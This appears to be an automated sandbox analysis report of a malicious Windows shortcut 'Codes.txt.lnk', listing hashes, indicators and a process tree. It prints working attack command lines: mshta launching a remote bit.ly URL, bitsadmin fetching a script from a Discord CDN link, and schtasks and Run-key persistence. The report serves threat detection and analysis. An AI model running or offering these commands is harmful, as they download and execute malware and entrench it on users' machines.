Analysis
-
max time kernel
1793s -
max time network
1799s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
02-08-2021 20:16
Static task
static1
Behavioral task
behavioral1
Sample
Codes.txt.lnk
Resource
win7v20210408
Behavioral task
behavioral2
Sample
Codes.txt.lnk
Resource
win10v20210410
General
-
Target
Codes.txt.lnk
-
Size
1KB
-
MD5
537399896538f5897c325a350603a567
-
SHA1
0a2ff41a38f91f79dde2a579138396bc5e5a7378
-
SHA256
91b660e99b14d4d790953f9db3ba34d046d494624b53f53ef646fab40c64ace2
-
SHA512
fb61b629d1ba6c38164bf21a637a28dc741fe29df47ae81af0e448273b30a60504085f94ee3d31e981ca9d23ba7517a13ac4a8a4e805a13999d67bd29daec030
Malware Config
Extracted
https://bit.ly/3j6OXnh
Signatures
-
Blocklisted process makes network request 6 IoCs
Processes:
mshta.exeWScript.exeWScript.exeflow pid process 7 1064 mshta.exe 9 1064 mshta.exe 11 1064 mshta.exe 13 1064 mshta.exe 17 1536 WScript.exe 21 1864 WScript.exe -
Drops startup file 2 IoCs
Processes:
WScript.exeWScript.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c1.js WScript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c1.js WScript.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
WScript.exeWScript.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\JJM3W6LMN3 = "\"C:\\Users\\Admin\\AppData\\Roaming\\c1.js\"" WScript.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\JJM3W6LMN3 = "\"C:\\Users\\Admin\\AppData\\Roaming\\c1.js\"" WScript.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 mshta.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a mshta.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a mshta.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
cmd.exemshta.exeWScript.exetaskeng.exeWScript.exedescription pid process target process PID 1608 wrote to memory of 1064 1608 cmd.exe mshta.exe PID 1608 wrote to memory of 1064 1608 cmd.exe mshta.exe PID 1608 wrote to memory of 1064 1608 cmd.exe mshta.exe PID 1064 wrote to memory of 744 1064 mshta.exe bitsadmin.exe PID 1064 wrote to memory of 744 1064 mshta.exe bitsadmin.exe PID 1064 wrote to memory of 744 1064 mshta.exe bitsadmin.exe PID 1064 wrote to memory of 1536 1064 mshta.exe WScript.exe PID 1064 wrote to memory of 1536 1064 mshta.exe WScript.exe PID 1064 wrote to memory of 1536 1064 mshta.exe WScript.exe PID 1536 wrote to memory of 608 1536 WScript.exe schtasks.exe PID 1536 wrote to memory of 608 1536 WScript.exe schtasks.exe PID 1536 wrote to memory of 608 1536 WScript.exe schtasks.exe PID 1476 wrote to memory of 1864 1476 taskeng.exe WScript.exe PID 1476 wrote to memory of 1864 1476 taskeng.exe WScript.exe PID 1476 wrote to memory of 1864 1476 taskeng.exe WScript.exe PID 1864 wrote to memory of 1528 1864 WScript.exe schtasks.exe PID 1864 wrote to memory of 1528 1864 WScript.exe schtasks.exe PID 1864 wrote to memory of 1528 1864 WScript.exe schtasks.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Codes.txt.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "https://bit.ly/3j6OXnh"2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://cdn.discordapp.com/attachments/870779144429006911/870824147524157480/c1.js C:\Users\Admin\AppData\Local\Temp\c1.js3⤵
- Download via BitsAdmin
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c1.js"3⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr "C:\Users\Admin\AppData\Roaming\c1.js4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\taskeng.exetaskeng.exe {7D67F7E4-C1D3-47BC-8A75-31D0329D11B1} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\c1.js"2⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr "C:\Users\Admin\AppData\Roaming\c1.js3⤵
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c1.jsMD5
8759dd865b3c3ac8ad0886c94755be9e
SHA1cc9a1cdf0622343f4971f3dab67279a1df403770
SHA2565b54ba3fc3b226af7f7a96b511338028ca481c56304b724b7d95335bfa159efc
SHA512957e0f85f4f0667c2bfb7b472e68de58fac21cdc22ac7e3fc8c6ccb7213f147fff351ea9b81c4249000c1bf7fa07f72ee4d5ffae71543765c8d5f6701d15ccab
-
C:\Users\Admin\AppData\Roaming\c1.jsMD5
a0f6fb7fa7c1cfcdbbfc67d307c74083
SHA158341f91d689f92a4a6918437d753deda79ebf4f
SHA25659f8cd4a8082917464fa030dbf1bc90f99d12f30fc4ba6cd3723db42ca9b12f7
SHA5125971476bc95241d03fe173a9f253eacc1c9efc8af065b71e32b31d221efe82f892c372fa8851dd61b86593bc776255ef9c664a15cf4549f9048eee69a3cc4873
-
memory/608-65-0x0000000000000000-mapping.dmp
-
memory/744-62-0x0000000000000000-mapping.dmp
-
memory/1064-61-0x0000000000000000-mapping.dmp
-
memory/1528-70-0x0000000000000000-mapping.dmp
-
memory/1536-63-0x0000000000000000-mapping.dmp
-
memory/1608-60-0x000007FEFB631000-0x000007FEFB633000-memory.dmpFilesize
8KB
-
memory/1864-67-0x0000000000000000-mapping.dmp